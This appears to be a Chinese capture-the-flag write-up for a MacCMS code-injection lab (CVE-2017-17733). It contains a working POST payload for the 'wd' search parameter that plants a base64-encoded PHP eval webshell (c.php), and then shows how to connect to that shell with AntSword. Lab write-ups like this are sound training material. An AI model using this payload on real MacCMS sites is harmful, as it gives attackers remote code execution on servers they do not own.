春秋云境CVE-2017-17733

1.阅读靶场介绍

这里可以给各位讲一下自己的愚见

就是涉及这些字眼的靶场介绍"远程攻击者可借助index.php?m=vod-search请求中的'wd'参数利用该漏洞执行命令。"

简单来说就是:关于路径还有攻击参数的

我们都可以直接使用hackbar这种形式的工具去完成webshell

2.启动靶场

我们会得到一个如下的页面

接下来就是去攻克他了,其实也是一个很简单的步骤

3.poc

我们对页面点击F12

然后输入这个url

https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/index.php?m=vod-search

再post这个参数

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

这里的意思就是发送一个参数给这个url

文件是c.php,内容是c(密码)

这里我们可以去访问一下
https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/c.php

这就说明上面的所有步骤都是成功的

好啦接下里就是中国蚁剑启动

输入完如上的数据后,点击测试后添加

进去就是这个页面哟

flag就在你们面前了

恭喜各位彦祖和亦非们又攻克一个靶场了

感谢你们宝贵的时间

相关推荐
上海云盾商务经理杨杨2 小时前
Web渗透核心漏洞:SQL注入漏洞测试与修复实战
数据库·sql·安全
Championship.23.243 小时前
AI驱动的网络安全革命:威胁检测与防御实战指南
人工智能·安全·web安全
汽车仪器仪表相关领域5 小时前
Kvaser Air Bridge Light HS:免配置工业级无线 CAN 桥接器,70 米稳定传输,移动设备与动态场景的 CAN 互联理想之选
人工智能·功能测试·安全·单元测试·汽车·可用性测试
上海云盾王帅6 小时前
WEB业务如何接入安全防护:从零到一的实战指南
前端·安全
其实防守也摸鱼6 小时前
软件安全与漏洞--软件安全设计
运维·网络·安全·网络安全·密码学·需求分析·软件安全
一只数据集7 小时前
NVIDIA Nemotron AIQ Agentic Safety Dataset:面向企业级智能体系统的安全与防护评估数据集全面解析
网络·数据库·安全
treesforest7 小时前
IP地址段查询完全指南:从单IP查到IPv4段批量归属地查询
网络·数据库·网络协议·tcp/ip·网络安全·运维开发
黎阳之光7 小时前
全域实景立体管控:数字孪生与视频孪生技术体系白皮书
大数据·人工智能·算法·安全·数字孪生
KKKlucifer8 小时前
API全生命周期安全管控:从开发、上线到下线闭环
安全